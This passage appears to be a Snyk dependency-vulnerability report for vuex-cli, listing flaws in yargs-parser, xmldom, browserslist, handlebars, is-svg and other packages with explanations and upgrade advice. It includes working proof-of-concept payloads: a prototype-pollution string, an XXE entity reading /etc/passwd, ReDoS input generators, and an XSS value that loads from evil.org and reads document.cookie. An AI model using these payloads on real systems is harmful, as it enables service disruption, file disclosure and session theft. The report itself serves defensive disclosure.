Our research team checked several attack vectors to verify this vulnerability:

  1. It could be used for privilege escalation.
  2. The library could be used to parse user input received from different sources:
    • terminal emulators
    • system calls from other code bases
    • CLI RPC servers

PoC by Snyk

const parser = require("yargs-parser");
console.log(parser('--foo.__proto__.bar baz'));
console.log(({}).bar);

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade yargs-parser to version 5.0.1, 13.1.2, 15.0.1, 18.1.1 or higher.

References

medium severity

XML External Entity (XXE) Injection

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection. Does not correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents.

Details

XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.

For example, below is a sample XML document, containing an XML element- username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
   <username>John</username>
</xml>

An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <username>&xxe;</username>
</xml>

Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.

Remediation

Upgrade xmldom to version 0.5.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: browserslist
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 autoprefixer@6.7.7 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 autoprefixer@6.7.7 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-loader@8.7.1 autoprefixer@6.7.7 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 caniuse-api@1.6.1 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-rules@2.1.2 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 pixrem@3.0.2 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 autoprefixer@6.7.7 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-rules@2.1.2 caniuse-api@1.6.1 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-rules@2.1.2 browserslist@1.7.7
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-rules@2.1.2 caniuse-api@1.6.1 browserslist@1.7.7

Overview

browserslist is a Share target browsers between different front-end tools, like Autoprefixer, Stylelint and babel-env-preset

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.

PoC by Yeting Li

var browserslist = require("browserslist")
function build_attack(n) {
    var ret = "> "
    for (var i = 0; i < n; i++) {
        ret += "1"
    }
    return ret + "!";
}

// browserslist('> 1%')

//browserslist(build_attack(500000))
for(var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try{
            browserslist(attack_str);
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
            }
        catch(e){
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
        }
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade browserslist to version 4.16.5 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: color-string
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-gray@3.0.1 color@0.11.4 color-string@0.3.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hwb@2.0.1 color@0.11.4 color-string@0.3.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rebeccapurple@2.0.1 color@0.11.4 color-string@0.3.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hex-alpha@2.0.0 color@0.10.1 color-string@0.3.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-colormin@2.2.2 colormin@1.1.2 color@0.11.4 color-string@0.3.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-function@2.0.1 css-color-function@1.3.3 color@0.11.4 color-string@0.3.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-colormin@2.2.2 colormin@1.1.2 color@0.11.4 color-string@0.3.0

Overview

color-string is a Parser and generator for CSS color strings

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the hwb regular expression in the cs.get.hwb function in index.js. The affected regular expression exhibits quadratic worst-case time complexity.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade color-string to version 1.5.5 or higher.

References

medium severity

Improper Control of Dynamically-Managed Code Resources

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.10.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources due to the lack of certain pollution protection mechanisms. An attacker can exploit this vulnerability to manipulate object properties that should not be accessible or modifiable.

Note:

Even after updating to the fix version that adds enhanced protection against prototype pollution, it is still possible to override the hasOwnProperty method.

Remediation

Upgrade ejs to version 3.1.10 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars provides the power necessary to let you build semantic templates.

When using attributes without quotes in a handlebars template, an attacker can manipulate the input to introduce additional attributes, potentially executing code. This may lead to a Cross-site Scripting (XSS) vulnerability, assuming an attacker can influence the value entered into the template. If the handlebars template is used to render user-generated content, this vulnerability may escalate to a persistent XSS vulnerability.

Details

Cross-Site Scripting (XSS) attacks occur when an attacker tricks a user’s browser to execute malicious JavaScript code in the context of a victim’s domain. Such scripts can steal the user’s session cookies for the domain, scrape or modify its content, and perform or modify actions on the user’s behalf, actions typically blocked by the browser’s Same Origin Policy.

These attacks are possible by escaping the context of the web application and injecting malicious scripts in an otherwise trusted website. These scripts can introduce additional attributes (say, a "new" option in a dropdown list or a new link to a malicious site) and can potentially execute code on the clients side, unbeknown to the victim. This occurs when characters like < > " ' are not escaped properly.

There are a few types of XSS:

  • Persistent XSS is an attack in which the malicious code persists into the web app’s database.
  • Reflected XSS is an which the website echoes back a portion of the request. The attacker needs to trick the user into clicking a malicious link (for instance through a phishing email or malicious JS on another page), which triggers the XSS attack.
  • DOM-based XSS is an that occurs purely in the browser when client-side JavaScript echoes back a portion of the URL onto the page. DOM-Based XSS is notoriously hard to detect, as the server never gets a chance to see the attack taking place.

Example:

Assume handlebars was used to display user comments and avatar, using the following template: <img src={{avatarUrl}}><pre>{{comment}}</pre>

If an attacker spoofed their avatar URL and provided the following value: http://evil.org/avatar.png onload=alert(document.cookie)

The resulting HTML would be the following, triggering the script once the image loads: <img src=http://evil.org/avatar.png onload=alert(document.cookie)><pre>Gotcha!</pre>

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: html-minifier
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 html-webpack-plugin@2.30.1 html-minifier@3.5.21
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-html-loader@1.2.4 html-minifier@2.1.7

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the value parameter of the minify function. This vulnerability derives from the usage of insecure regular expression in reCustomIgnore.

PoC

  const { minify } = require('html-minifier');

const testReDoS = (repeatCount) => {
    const input = '\t'.repeat(repeatCount) + '.\t1x';

    const startTime = performance.now();

    try {
        minify(input);
    } catch (e) {
        console.error('Error during minification:', e);
    }

    const endTime = performance.now();
    console.log(`Input length: ${repeatCount} - Processing time: ${endTime - startTime} ms`);
};


for (let i = 5000; i <= 60000; i += 5000) {
    testReDoS(i);
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

There is no fixed version for html-minifier.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: is-svg
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 is-svg@2.1.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 is-svg@2.1.0

Overview

is-svg is a Check if a string or buffer is SVG

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input for a very long time.

You are only affected if you use this package on a server that accepts SVG as user-input.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade is-svg to version 4.2.2 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: is-svg
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 is-svg@2.1.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 is-svg@2.1.0

Overview

is-svg is a Check if a string or buffer is SVG

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the removeDtdMarkupDeclarations and entityRegex regular expressions, bypassing the fix for CVE-2021-28092.

PoC by Yeting Li

//1) 1st ReDoS caused by the two sub-regexes [A-Z]+ and [^>]* in `removeDtdMarkupDeclarations`.
const isSvg = require('is-svg');
function build_attack1(n) {
var ret = '<!'
for (var i = 0; i < n; i++) {
ret += 'DOCTYPE'
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack1(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

//2) 2nd ReDoS caused by ? the first sub-regex  \s*  in `entityRegex`.
function build_attack2(n) {
var ret = ''
for (var i = 0; i < n; i++) {
ret += ' '
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack2(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}


//3rd ReDoS caused by the sub-regex \s+\S*\s*  in `entityRegex`.
function build_attack3(n) {
var ret = '<!Entity'
for (var i = 0; i < n; i++) {
ret += ' '
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack3(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

//4th ReDoS caused by the sub-regex \S*\s*(?:"|')[^"]+  in `entityRegex`.
function build_attack4(n) {
var ret = '<!Entity '
for (var i = 0; i < n; i++) {
ret += '\''
}

return ret+"";
}
for(var i = 1; i <= 50000; i++) {
   if (i % 10000 == 0) {
       var time = Date.now();
       var attack_str = build_attack4(i);
       isSvg(attack_str);

       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade is-svg to version 4.3.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: loader-utils
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-loader@6.4.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 extract-text-webpack-plugin@1.0.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 file-loader@0.9.0 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 html-webpack-plugin@2.30.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 imports-loader@0.6.5 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-loader@0.9.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-style-loader@1.0.0 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 loader-utils@0.2.17

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the resourcePath variable in interpolateName.js.

